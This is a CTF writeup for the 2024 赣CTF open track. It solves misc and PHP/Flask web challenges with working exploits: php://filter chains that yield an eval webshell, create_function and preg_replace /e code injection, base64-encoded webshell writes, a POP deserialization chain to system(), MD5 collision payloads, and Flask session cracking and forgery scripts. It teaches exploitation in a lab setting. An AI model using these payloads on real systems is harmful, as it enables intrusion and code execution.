2024 赣CTF Open Track Writeups

MISC

Canon of Sherlock Holmes

Dancing Men font: https://zh.fonts2u.com/gl-dancingmen

Reading the glyphs in the image against that font, the key is: welcom

Decoding the encrypted text as kaomoji (颜文字) gives:

U2FsdGVkX1/TxK3KY15O+apT3QPSoVJujLDhUPI0c8MbkZT9ejKYz2vaM8HHgtaf
WcnrEnItCxPI6K8mHiJkZA==

The base64 prefix U2FsdGVkX1 decodes to "Salted__", the header of the OpenSSL/CryptoJS salted container (8-byte magic, 8-byte salt, then ciphertext; here 64 bytes in total, i.e. three AES blocks of ciphertext). AES decryption with the key above yields the flag.
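
As an added example (not code from the writeup), the script below parses that container and derives the key and IV the way CryptoJS-style "AES with passphrase" tools do: EVP_BytesToKey over MD5, one round. The MD5 choice is an assumption about the tool that produced the ciphertext; `openssl enc` since 1.1.0 defaults to SHA-256 for the same derivation, which is why the digest is a parameter. The AES-256-CBC step itself runs only if pycryptodome is installed; a wrong passphrase or wrong digest normally shows up as a PKCS#7 padding error rather than as garbage silently printed.

```python
import base64
import hashlib

# Ciphertext recovered above (base64 of the "Salted__" container).
CIPHERTEXT_B64 = (
    "U2FsdGVkX1/TxK3KY15O+apT3QPSoVJujLDhUPI0c8MbkZT9ejKYz2vaM8HHgtaf"
    "WcnrEnItCxPI6K8mHiJkZA=="
)
PASSPHRASE = b"welcom"   # key read off the Dancing Men glyphs


def parse_openssl_salted(b64: str):
    """Split an OpenSSL/CryptoJS container: b"Salted__" | 8-byte salt | ciphertext."""
    blob = base64.b64decode("".join(b64.split()))
    if blob[:8] != b"Salted__":
        raise ValueError("not an OpenSSL salted container")
    salt, ct = blob[8:16], blob[16:]
    if len(ct) % 16:
        raise ValueError("ciphertext is not a whole number of AES blocks")
    return salt, ct


def evp_bytes_to_key(passphrase: bytes, salt: bytes, key_len: int = 32,
                     iv_len: int = 16, digest=hashlib.md5) -> tuple:
    """EVP_BytesToKey with count=1: D_i = H(D_{i-1} || passphrase || salt),
    concatenated until key_len + iv_len bytes exist.  CryptoJS and
    openssl < 1.1.0 use md5 here; openssl >= 1.1.0 uses sha256."""
    derived, prev = b"", b""
    while len(derived) < key_len + iv_len:
        prev = digest(prev + passphrase + salt).digest()
        derived += prev
    return derived[:key_len], derived[key_len:key_len + iv_len]


def decrypt_salted(b64: str, passphrase: bytes, digest=hashlib.md5) -> bytes:
    """AES-256-CBC decrypt with PKCS#7 unpadding; needs pycryptodome (optional)."""
    try:
        from Crypto.Cipher import AES
    except ImportError as exc:
        raise RuntimeError("pip install pycryptodome to run the AES step") from exc
    salt, ct = parse_openssl_salted(b64)
    key, iv = evp_bytes_to_key(passphrase, salt, digest=digest)
    pt = AES.new(key, AES.MODE_CBC, iv).decrypt(ct)
    pad = pt[-1]
    if not 1 <= pad <= 16 or pt[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad padding: wrong passphrase or wrong KDF digest")
    return pt[:-pad]


if __name__ == "__main__":
    salt, ct = parse_openssl_salted(CIPHERTEXT_B64)
    print("salt:", salt.hex(), "ciphertext blocks:", len(ct) // 16)
    key, iv = evp_bytes_to_key(PASSPHRASE, salt)
    print("key:", key.hex(), "iv:", iv.hex())
    try:
        print(decrypt_salted(CIPHERTEXT_B64, PASSPHRASE))
    except (RuntimeError, ValueError) as err:
        print(err)
```

If the tool that produced the ciphertext used a different digest, pass `digest=hashlib.sha256` to `decrypt_salted`; the padding check will tell the two apart.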

坚持不懈的压缩 (Relentless Compression)

Nested zips (套娃). I borrowed a script that cracks each layer with fcrackzip and changed it to use the fixed password GCTF_yeyeyeye.

#!/usr/bin/env bash
# Peel nested zips: every layer uses the same password, so the fcrackzip
# call of the original script stays commented out and a constant is used.
password="GCTF_yeyeyeye"

shopt -s nullglob                      # an empty glob expands to nothing, not to '*.zip'
while :; do
    files=( *.zip )
    [ "${#files[@]}" -eq 0 ] && break   # no archives left: the innermost file is out
    for file in "${files[@]}"; do
        echo -n "Crack ${file}........"
        #password="$(fcrackzip -u -l 1-6 -c '1' "${file}" | tr -d '\n' | awk -F ' ' '{print $5}')"
        if [ -z "${password}" ]; then
            echo "FAIL!!!!!"
            break 2
        fi
        echo "FOUND PASSWORD : '${password}'"
        unzip -q -P "${password}" "${file}" || break 2   # wrong password: stop, don't delete
        rm "${file}"
    done
done

WEB

include_me
<?php
highlight_file(__FILE__);

if(isset($_GET['a'])&&file_get_contents($_GET['a'])=='GCTF 2024 has begun'){
    include($_POST['film']);
    echo "where is my flag";
}
else{
    echo "what are you doing?";
}

Key points: the data:// wrapper, and getting from file inclusion to command execution.

file_get_contents($_GET['a']) must return exactly "GCTF 2024 has begun"; a data:// URI supplies that content without any file on disk, e.g. a=data://text/plain,GCTF 2024 has begun. The include($_POST['film']) then takes a php://filter chain that decodes to PHP source:

https://github.com/synacktiv/php_filter_chain_generator

python3 php_filter_chain_generator.py --chain '<?php eval($_POST[1]); ?>'

generates the chain; sent as film=, it gives a webshell. Connect with AntSword (蚁剑) and run readflag in the filesystem root.

php_master
<?php
highlight_file(__FILE__);
error_reporting(0);

$num = $_GET['num'];
if(isset($_GET['num'])){
    if($num==="10086"){
        die("菜就多练");
    }

    if(intval($num,0)==10086){
        $code=$_GET['code'];
        $fffffilm="return $code";
        create_function('',$fffffilm);
    }else{
        die("菜就多多练");
    }
}

/?num=023546&code=;}phpinfo();//

"023546" is not the string "10086", so the === check passes, but intval("023546", 0) reads the leading 0 as an octal prefix, and 023546 octal is 10086. create_function('', "return $code") builds the function source from a string, so `;}` ends the return statement and closes the function body, phpinfo(); lands at top level, and `//` comments out the closing brace that create_function() appends. create_function() was deprecated in PHP 7.2 and removed in PHP 8.0, so this only works on a PHP 7 target.
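
Added example, not part of the original writeup: an emulation of intval($num, 0) for strings that reproduces the rules PHP applies (leading whitespace skipped, 0x/0X hex, 0b/0B binary, leading 0 octal, otherwise decimal, parsing stopping at the first character that is not a digit of that base as strtol() does), used to enumerate values that are numerically 10086 without being the string "10086". It also renders the source create_function() assembles so the `;}` ... `//` injection is visible; the function name __lambda_func in that rendering is illustrative.

```python
import re
import urllib.parse

TARGET = 10086


def php_intval_base0(s: str) -> int:
    """Emulate intval($s, 0) on a string.  PHP skips leading whitespace,
    handles a 0b/0B prefix itself and hands the rest to strtol() with base 0,
    which takes 0x/0X as hex, a leading 0 as octal and anything else as
    decimal, stopping at the first character that is not a digit of that
    base.  Approximation covering the forms relevant to this challenge."""
    s = s.lstrip(" \t\n\r\v\f")
    sign = 1
    if s[:1] in ("+", "-"):
        sign = -1 if s[0] == "-" else 1
        s = s[1:]
    low = s.lower()
    if low.startswith("0x"):
        base, body = 16, s[2:]
    elif low.startswith("0b"):
        base, body = 2, s[2:]
    elif low.startswith("0") and len(s) > 1:
        base, body = 8, s[1:]
    else:
        base, body = 10, s
    digits = "0123456789abcdef"[:base]
    run = re.match(f"[{digits}]*", body.lower()).group(0)
    return sign * int(run, base) if run else 0


def bypass_candidates(target: int) -> list:
    """Strings that are !== str(target) while intval(..., 0) == target."""
    cands = [
        "0" + format(target, "o"),     # octal, the form used above
        "0x" + format(target, "x"),    # hex
        "0b" + format(target, "b"),    # binary
        f"{target}abc",                # strtol() stops at the first non-digit
        f" {target}",                  # leading whitespace is skipped
    ]
    return [c for c in cands if c != str(target) and php_intval_base0(c) == target]


def create_function_source(code: str, name: str = "__lambda_func") -> str:
    """The source create_function('', "return $code") compiles (name illustrative).
    With code ';}phpinfo();//' the body is closed early, phpinfo() lands at
    file scope and the trailing '}' is commented out."""
    return f"function {name}(){{return {code}}}"


def build_query(num: str, code: str) -> str:
    return "?" + urllib.parse.urlencode({"num": num, "code": code})


if __name__ == "__main__":
    for cand in bypass_candidates(TARGET):
        print(repr(cand), "->", php_intval_base0(cand))
    print(create_function_source(";}phpinfo();//"))
    print(build_query("023546", ";}phpinfo();//"))
```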

ez_md5
<?php
highlight_file(__file__);
error_reporting(0);

$Game1=$_GET['Game1'];
$Game2=$_GET['Game2'];
if(isset($Game1) && isset($Game2))
{
   if ($Game1!==$Game2 && md5($Game1)==md5($Game2))
   {
      echo "芜湖~";
      if (is_string($_GET['Two1']) && is_string($_GET['Two2']))
      {
         if ($_GET['Two1']!==$_GET['Two2'] && md5($_GET['Two1'])===md5($_GET['Two2']))
         {
            $play="weclome GCTf!";
            echo "芜湖~芜湖~";
            if (is_string($play.$_POST['flag']) && is_string($play.$_POST['f1ag']))
            {
               if ($play.$_POST['flag']!==$play.$_POST['f1ag'] && md5($play.$_POST['flag'])===md5($play.$_POST['f1ag']))
               {
                echo "\n";
                echo "good!";
                echo file_get_contents('/flag');
                
               }
               else
               {
                echo "马上了";
               }
              
           
            }
            else
            {
               echo "就在眼前了";
            }
         }
         else 
         {
            echo "应该快了";
         }
      }
      else
      {
         echo "变了一点";
      }
   }
   else
   {
      echo "不对~不对";
   }
}
else
{
   echo "md5的小游戏";
}

Three stages. Game1/Game2 are compared with ==: 240610708 and 314282422 are "magic hashes", strings whose MD5 hex digest starts with 0e followed only by digits, which PHP's loose comparison reads as the number 0, so md5($Game1)==md5($Game2) holds while the strings differ. Two1/Two2 use ===, so a genuine MD5 collision is needed: the two 64-byte blobs in the request are a published single-block MD5 collision pair (Marc Stevens, 2012), URL-encoded. For flag/f1ag the hashed inputs share the fixed prefix "weclome GCTf!", so the collision has to be computed from that prefix: 51 NUL bytes pad the 13-byte prefix to a full 64-byte block, followed by two fastcoll-style collision blocks. The last stage used this collision tool: https://github.com/iamjazz/Md5collision

POST /?Game1=240610708&Game2=314282422&Two1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&Two2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2 HTTP/1.1
Host: 42.193.226.63:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: http304ok=1
X-Real-IP: 127.0.0.1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 939

f1ag=%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00L%5D%CF%C4%E9%87O%F5E%D2%BD%ED%F9%EA%A5%12%8Bxv%DC%B5%3B%A1%82%2B%12%3F%FD%D1N%24%B7d%1B%B1%0B%3EKg%F2K%22%3C%3B%04%5EaKK%C6%A1%3B%A1%87%7DLj%1F%EC%CF%0AR%DD%5B%FB%E6k6TQ%8C%2A%A6g%2AMc%A1%DF%FD%82S%0B%97%BF%CEv%1C%10%85%E8%F6%CE%14%7D%CF%E5%CE6N%3C6%26F%BA%8A%11B%97%2C%B6%9F%E8%08%11%2B%A0%CDcNr%24q%D7%7CG%E1c&flag=%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00L%5D%CF%C4%E9%87O%F5E%D2%BD%ED%F9%EA%A5%12%8Bxv%5C%B5%3B%A1%82%2B%12%3F%FD%D1N%24%B7d%1B%B1%0B%3EKg%F2K%22%3C%3B%04%DE%60KK%C6%A1%3B%A1%87%7DLj%1F%ECO%0AR%DD%5B%FB%E6k6TQ%8C%2A%A6g%2AMc%A1%DF%FD%82S%0B%17%BF%CEv%1C%10%85%E8%F6%CE%14%7D%CF%E5%CE6N%3C6%26F%BA%8A%11B%97%AC%B6%9F%E8%08%11%2B%A0%CDcNr%24qW%7CG%E1c
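
Added example, not part of the original writeup: it re-runs every comparison of the challenge offline on the values from the request above, so each stage can be checked before sending. The magic-hash test and the numeric-string emulation of PHP's == are approximations sufficient for hex digests; the byte strings are copied from the request (the 51 NUL bytes written as a repetition).

```python
import hashlib
import re
from urllib.parse import unquote_to_bytes


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def is_magic_hash(s: str) -> bool:
    """md5(s) is '0e' followed only by digits (stage 1).  PHP's == reads such a
    hex digest as the numeric string 0e<digits>, i.e. the float 0, so any two
    of them compare equal although the inputs differ."""
    return re.fullmatch(r"0e\d+", md5_hex(s.encode())) is not None


def php_loose_equal(a: str, b: str) -> bool:
    """== on two strings: both numeric -> compared as numbers, else byte-wise.
    Approximation of PHP's numeric-string grammar, enough for hex digests."""
    numeric = re.compile(r"\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*")
    if numeric.fullmatch(a) and numeric.fullmatch(b):
        return float(a) == float(b)
    return a == b


def form_bytes(value: str) -> bytes:
    """One application/x-www-form-urlencoded value, decoded to raw bytes."""
    return unquote_to_bytes(value.replace("+", " "))


def strict_collision(a: bytes, b: bytes, prefix: bytes = b"") -> bool:
    """The === checks of stages 2 and 3: inputs differ, digests of prefix+input match."""
    return a != b and md5_hex(prefix + a) == md5_hex(prefix + b)


# Stage-2 values exactly as they appear in the request above.
TWO1 = "M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2"
TWO2 = "M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2"

# Stage-3 values: $play, then the two POST bodies (51 NUL bytes, then 128 bytes).
PLAY = b"weclome GCTf!"
F1AG = "%00" * 51 + "L%5D%CF%C4%E9%87O%F5E%D2%BD%ED%F9%EA%A5%12%8Bxv%DC%B5%3B%A1%82%2B%12%3F%FD%D1N%24%B7d%1B%B1%0B%3EKg%F2K%22%3C%3B%04%5EaKK%C6%A1%3B%A1%87%7DLj%1F%EC%CF%0AR%DD%5B%FB%E6k6TQ%8C%2A%A6g%2AMc%A1%DF%FD%82S%0B%97%BF%CEv%1C%10%85%E8%F6%CE%14%7D%CF%E5%CE6N%3C6%26F%BA%8A%11B%97%2C%B6%9F%E8%08%11%2B%A0%CDcNr%24q%D7%7CG%E1c"
FLAG = "%00" * 51 + "L%5D%CF%C4%E9%87O%F5E%D2%BD%ED%F9%EA%A5%12%8Bxv%5C%B5%3B%A1%82%2B%12%3F%FD%D1N%24%B7d%1B%B1%0B%3EKg%F2K%22%3C%3B%04%DE%60KK%C6%A1%3B%A1%87%7DLj%1F%ECO%0AR%DD%5B%FB%E6k6TQ%8C%2A%A6g%2AMc%A1%DF%FD%82S%0B%17%BF%CEv%1C%10%85%E8%F6%CE%14%7D%CF%E5%CE6N%3C6%26F%BA%8A%11B%97%AC%B6%9F%E8%08%11%2B%A0%CDcNr%24qW%7CG%E1c"


def check_request() -> dict:
    """Re-run every comparison of the challenge on the values from the request."""
    flag, f1ag = form_bytes(FLAG), form_bytes(F1AG)
    nuls = len(flag) - len(flag.lstrip(b"\x00"))
    return {
        "stage1": php_loose_equal(md5_hex(b"240610708"), md5_hex(b"314282422")),
        "stage2": strict_collision(form_bytes(TWO1), form_bytes(TWO2)),
        "stage3": strict_collision(flag, f1ag, PLAY),
        "stage3_prefix_block_aligned": (len(PLAY) + nuls) % 64 == 0,
        "stage3_collision_blocks": (len(flag) - nuls) // 64,
    }


if __name__ == "__main__":
    for name, value in check_request().items():
        print(f"{name}: {value}")
```

The block-alignment entry is the part worth remembering when reproducing the third stage: fastcoll-style tools collide from a chaining value, so the chosen prefix has to end on a 64-byte boundary before the collision blocks start.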
玩会游戏 (Play a Game)

At the bottom of the JS file there is a base64-encoded hint:

6L+Z6YeM6Z2i55qE5Lic6KW/5L2g6IKv5a6a5Zac5qyiOnNoZWxsLnBocA==

which decodes to "这里面的东西你肯定喜欢:shell.php" ("you will surely like what is in here: shell.php").

Open shell.php and pass ?Game=system('cat /flag'); as a GET parameter to get the flag.

你到底多想要flag??? (How badly do you want the flag???)
<?php
highlight_file(__FILE__);
error_reporting(0);
echo '告诉我你有多想flag!';
if(isset($_GET['callme']))
{
    $call_me=$_GET['callme'];
    if(preg_match('/flag/is',$call_me))
    {
        die('你怎么能这么直白的要flag呢?');
    }
    if(stripos($call_me,'flag')===false)
    {
        die('看来你还是不想要flag,连flag都不给我');
    }
    echo '你过了?哦!我知道了,一定是这个。';
    if(isset($_POST['want'])) 
    {
        $call_me_you_want=$_POST['want'];
        if(preg_match('/.+?flag/is',$call_me_you_want))
        {
            die('不够长哦,看来你还是不想要flag!');
        }
        if(!stripos($call_me_you_want,'flag')===true)
        {
            die('我flag呢?');
        }
        echo "好吧,把flag给你吧";
        include("/flag");
        echo $flag;
    }
}
?>

Key points: the preg_match() array bypass and the PCRE backtracking limit.

callme[]=flag makes $call_me an array. preg_match() then returns false (with a warning) instead of a match count, so the first die() is skipped, and stripos() on an array returns NULL, which is not === false, so the second die() is skipped too (PHP 7 behaviour; PHP 8 throws a TypeError for both). For want, one million 'a' followed by 'flag' makes /.+?flag/is exceed pcre.backtrack_limit (default 1000000), so preg_match() returns false rather than 1. The last check is !stripos(...)===true: ! binds tighter than ===, so it evaluates (!1000000)===true, i.e. false===true, and the die() is skipped because 'flag' is not at offset 0.

import requests

# callme[]=flag turns $_GET['callme'] into an array: preg_match() and stripos()
# both fail "open", which skips the two die() calls of the first stage.
url = "http://8.136.110.121:8002/?callme[]=flag"
# One million characters before "flag" push /.+?flag/is past pcre.backtrack_limit,
# so preg_match() returns false; stripos() still finds "flag" (at offset 1000000, not 0).
data = {'want': 'a' * 1000000 + 'flag'}
res = requests.post(url=url, data=data)
print(res.text)

rceme

A %0a newline breaks out of the `#` comment, and __HALT_COMPILER(); then stops the compiler so the syntax error the concatenated trailing string would cause is never parsed. This writes a webshell; connecting with AntSword (蚁剑), the flag is found in the env environment variables.

?cmd=%0afile_put_contents('shell3.php', base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4='));__HALT_COMPILER();

ez_pop

Bypass __wakeup() with a reference

The chain is Start::__destruct() -> string conversion of $name -> BE::__toString() -> unset() of a CA property -> CA::__unset() -> ON::getflag() -> system(). The obstacle is __wakeup(), which resets $name to "hacker" and copies $b into $a, so $name would never hold the BE object. Making $a a reference to $name ($a->a=&$a->name, serialized as R:2) turns that against itself: __wakeup() first writes "hacker" through the reference, then `$this->a = $this->b` writes the BE object into the same slot, so $name ends up being the BE object and __destruct() triggers __toString(). The generating script (challenge classes plus the chain set-up):

<?php
error_reporting(0);
class Start{
    public $a;
    public $b;
    public $name;

    public function __wakeup(){
        $this->name="hacker";
        $this->a = $this->b;
    }

    public function __destruct(){
        echo 'Get out!'.$this->name;
    }
}

class BE{
    public $first;
    public $var;

    public function __toString(){
        unset($this->first->{$this->var});
        return "ctfer";
    }
}

class CA{
    public $second;
    public $function;

    public function __unset($parameter){
        echo '__unset';
        return $this->second->{$this->function}($parameter);
    }
}
class ON{
    function getflag($a){
        system($a);
    }
}

$a=new Start;
$b=new BE;
$c=new CA;
$d=new ON;
$c->second=$d;
$c->function='getflag';
$b->first=$c;
$b->var='env';

$a->b=$b;
$a->a=&$a->name;

echo serialize($a);

?beacon=O:5:"Start":3:{s:1:"a";N;s:1:"b";O:2:"BE":2:{s:5:"first";O:2:"CA":2:{s:6:"second";O:2:"ON":0:{}s:8:"function";s:7:"getflag";}s:3:"var";s:3:"env";}s:4:"name";R:2;}

ez_flask
The cookie payload is only base64-encoded JSON, so it can be read without the secret:

import zlib
from flask.sessions import session_json_serializer   # Flask's TaggedJSONSerializer
from itsdangerous import base64_decode               # URL-safe base64 tolerant of missing padding

def decryption(payload):
    """Read a Flask session cookie WITHOUT the secret: the payload is base64
    (optionally zlib-compressed); the signature at the end is simply ignored."""
    payload, sig = payload.rsplit(b'.', 1)          # strip signature
    payload, timestamp = payload.rsplit(b'.', 1)    # strip timestamp

    decompress = False
    if payload.startswith(b'.'):                    # leading '.' marks a zlib-compressed payload
        payload = payload[1:]
        decompress = True

    try:
        payload = base64_decode(payload)
    except Exception:
        raise Exception('Could not base64 decode the payload because of '
                        'an exception')

    if decompress:
        try:
            payload = zlib.decompress(payload)
        except Exception:
            raise Exception('Could not zlib decompress the payload before '
                            'decoding the payload')

    return session_json_serializer.loads(payload)

if __name__ == '__main__':
    s = "eyJhZG1pbiI6MCwidXNlcm5hbWUiOiJhZG1pbiJ9.ZyVfcQ.RW8FOdf7sUlVVlwulZskfvgww3s"
    print(decryption(s.encode()))

The payload decodes to {"admin": 0, "username": "admin"}, so admin has to become 1, which requires re-signing with the secret.

Brute-force the secret:

https://github.com/Paradoxis/Flask-Unsign

flask-unsign --unsign --cookie eyJhZG1pbiI6MCwidXNlcm5hbWUiOiJhZG1pbiJ9.ZyVfcQ.RW8FOdf7sUlVVlwulZskfvgww3s

Forge the session:

https://github.com/noraj/flask-session-cookie-manager

Decode: python flask_session_cookie_manager3.py decode -s "secret_key" -c "session value to decode"
Encode: python flask_session_cookie_manager3.py encode -s "secret_key" -t "session data to encode"

With the recovered secret, sign a session with admin set to 1:

python3 flask_session_cookie_manager3.py encode -s 103.025665766 -t "{'admin': 1, 'username': 'admin'}"
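
Added example (not part of the writeup or of the two tools above): a dependency-free reimplementation of what flask-unsign and flask-session-cookie-manager do with a candidate secret. It decodes the payload, checks a signature the way Flask's SecureCookieSessionInterface does (salt "cookie-session", key derived as HMAC-SHA1(secret, salt), signature HMAC-SHA1 over payload.timestamp, URL-safe base64 without padding) and forges a cookie for a given secret. Compact, key-sorted JSON is the Flask default serialization assumed here; zlib-compressed payloads (leading ".") are handled on decode only. The timestamp is plain Unix time as in itsdangerous 2.x; itsdangerous 1.x subtracted a 2011 epoch, so cookies from old deployments would not round-trip through this code.

```python
import base64
import hashlib
import hmac
import json
import time
import zlib

SALT = b"cookie-session"   # Flask's SecureCookieSessionInterface.salt
COOKIE = "eyJhZG1pbiI6MCwidXNlcm5hbWUiOiJhZG1pbiJ9.ZyVfcQ.RW8FOdf7sUlVVlwulZskfvgww3s"


def b64e(raw: bytes) -> str:
    """itsdangerous-style URL-safe base64 without '=' padding."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64d(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def split_cookie(cookie: str) -> tuple:
    payload, ts, sig = cookie.rsplit(".", 2)
    return payload, ts, sig


def decode_session(cookie: str) -> dict:
    """Read the session data without the secret: it is encoded, not encrypted."""
    payload = split_cookie(cookie)[0]
    if payload.startswith("."):            # '.' prefix marks a zlib-compressed payload
        return json.loads(zlib.decompress(b64d(payload[1:])))
    return json.loads(b64d(payload))


def timestamp_of(cookie: str) -> int:
    return int.from_bytes(b64d(split_cookie(cookie)[1]), "big")


def signature(secret: str, signed_value: str) -> str:
    """Flask defaults: derived = HMAC-SHA1(secret, salt); sig = HMAC-SHA1(derived, payload.ts)."""
    derived = hmac.new(secret.encode(), SALT, hashlib.sha1).digest()
    return b64e(hmac.new(derived, signed_value.encode(), hashlib.sha1).digest())


def verify(cookie: str, secret: str) -> bool:
    payload, ts, sig = split_cookie(cookie)
    return hmac.compare_digest(signature(secret, f"{payload}.{ts}"), sig)


def forge(secret: str, data: dict, ts=None) -> str:
    """A cookie Flask accepts for `secret` (what flask-session-cookie-manager encode does)."""
    ts = int(time.time()) if ts is None else ts
    payload = b64e(json.dumps(data, separators=(",", ":"), sort_keys=True).encode())
    ts_b64 = b64e(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    body = f"{payload}.{ts_b64}"
    return f"{body}.{signature(secret, body)}"


def crack(cookie: str, candidates):
    """Offline brute force over candidate secrets (what flask-unsign --unsign does)."""
    for secret in candidates:
        if verify(cookie, secret):
            return secret
    return None


if __name__ == "__main__":
    print(decode_session(COOKIE), timestamp_of(COOKIE))
    recovered = "103.025665766"           # the secret found with flask-unsign above
    print("page secret verifies:", verify(COOKIE, recovered))
    print(forge(recovered, {"admin": 1, "username": "admin"}))
```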

xxxxxx
<?php
error_reporting(0);
highlight_file(__FILE__);
function check($string){
    return preg_replace("/Good|Tou|pluto|fewOo|just_do|feng/" ,'', $string);
}
$User['username'] = $_POST['name'];
$User['password'] = $_POST['passwd'];
$User['sign'] = 'dddd';

$Fin = check(serialize($User));
if(unserialize($Fin)[sign] == "GCTF"){
    echo file_get_contents('/flag');
}

name=GoodGoodTouGoodGoodTou&passwd=;s:8:"password";s:1:"b";s:4:"sign";s:4:"GCTF";}

check() runs after serialize(), so it shortens the username's content while the declared length s:22 stays. The 22 characters PHP then reads as the username are the text that follows: ";s:8:"password";s:47: (19 characters plus the two-digit password length and its colon). The password's opening quote becomes the username's closing quote, and the password content ;s:8:"password";s:1:"b";s:4:"sign";s:4:"GCTF";} is parsed as the rest of the array, closing it with sign set to "GCTF"; the genuine sign entry is left after the closing brace and ignored. The username is exactly 22 characters of filter words (4×Good + 2×Tou) so that it is removed completely.
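
Added example, not from the writeup: a PHP-style serializer for the $User array, the check() filter, and a minimal unserialize() that consumes exactly the declared byte count for s:N:"..." the way PHP does. It derives why the username must lose exactly 22 characters and searches the filter word list for a combination of that length, so the same construction can be reused with a different injected tail.

```python
import re

# The words preg_replace() strips, in the order the pattern lists them.
WORDS = ["Good", "Tou", "pluto", "fewOo", "just_do", "feng"]
FILTER = re.compile("|".join(map(re.escape, WORDS)))


def check(s: str) -> str:
    """The challenge's check(): preg_replace() with no length bookkeeping."""
    return FILTER.sub("", s)


def php_serialize(value) -> str:
    """serialize() for the subset used here: int, str, and dict -> PHP array."""
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, str):
        return f's:{len(value.encode())}:"{value}";'
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return f"a:{len(value)}:{{{body}}}"
    raise TypeError(type(value))


def php_unserialize(data: str):
    """unserialize() for the same subset.  s:N:"..." consumes exactly N bytes
    and then requires '";' whatever those bytes contain: once check() has
    shortened the username, the N bytes run on into the password field.
    Bytes after the outer closing brace are ignored, as PHP does."""
    pos = 0

    def parse():
        nonlocal pos
        tag = data[pos]
        if tag == "i":
            end = data.index(";", pos)
            value = int(data[pos + 2:end])
            pos = end + 1
            return value
        if tag == "s":
            end = data.index(":", pos + 2)
            n = int(data[pos + 2:end])
            start = end + 2                              # skip  :"
            value = data[start:start + n]
            if data[start + n:start + n + 2] != '";':
                raise ValueError(f"bad string terminator at offset {start + n}")
            pos = start + n + 2
            return value
        if tag == "a":
            end = data.index(":", pos + 2)
            count = int(data[pos + 2:end])
            pos = end + 2                                # skip  :{
            out = {}
            for _ in range(count):
                key = parse()
                out[key] = parse()
            if data[pos] != "}":
                raise ValueError("array not closed")
            pos += 1
            return out
        raise ValueError(f"unsupported type {tag!r} at offset {pos}")

    return parse()


def filler(length: int, words=WORDS) -> str:
    """A concatenation of filter words with exactly `length` characters.  The
    filter removes all of it (no word is a prefix of another and the scan is
    left to right), so nothing is left behind the declared s:N."""
    reach = {0: ""}
    for n in range(1, length + 1):
        for w in words:
            if n - len(w) in reach:
                reach[n] = reach[n - len(w)] + w
                break
    if length not in reach:
        raise ValueError("no combination of filter words has that length")
    return reach[length]


def build_payload(inject: str) -> dict:
    """`inject` is the array tail that should replace the real one.  The
    username must be as long as the text PHP will swallow into it:
    '";s:8:"password";s:' plus the digits of len(inject) plus ':', so that the
    password's opening quote becomes the username's closing quote and
    `inject` is parsed as the remainder of the array."""
    eat = len('";s:8:"password";s:') + len(str(len(inject))) + len(":")
    return {"name": filler(eat), "passwd": inject}


def server_side(name: str, passwd: str) -> dict:
    """What the challenge computes: unserialize(check(serialize($User)))."""
    user = {"username": name, "password": passwd, "sign": "dddd"}
    return php_unserialize(check(php_serialize(user)))


INJECT = ';s:8:"password";s:1:"b";s:4:"sign";s:4:"GCTF";}'

if __name__ == "__main__":
    payload = build_payload(INJECT)
    print(payload)
    print(server_side(payload["name"], payload["passwd"]))
```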

ezphp

preg_replace() code execution

<?php

highlight_file(__FILE__);
error_reporting(0);
$a=$_POST['a'];
$b=$_POST['b'];
$c=$_POST['c'];
if($a!=$b && md5($a)==md5($b)){
    echo 'next'.'<br>';
    if(preg_match('/^nihao$/', $_GET['A_a_B.b']) && $_GET['A_a_B.b'] !='nihao' && !preg_match('/[0-9]/', $c) && intval($c)){
        echo 'give you'.'<br>';
        echo preg_replace($_GET['a'],$_GET['b'],$_GET['c']);
    }
}

?>

/?A[a_B.b=nihao%0a&a=/test/e&b=system('cat flag')&c=test

POST body:

a=240610708&b=QNKCDZO&c[]=\xff

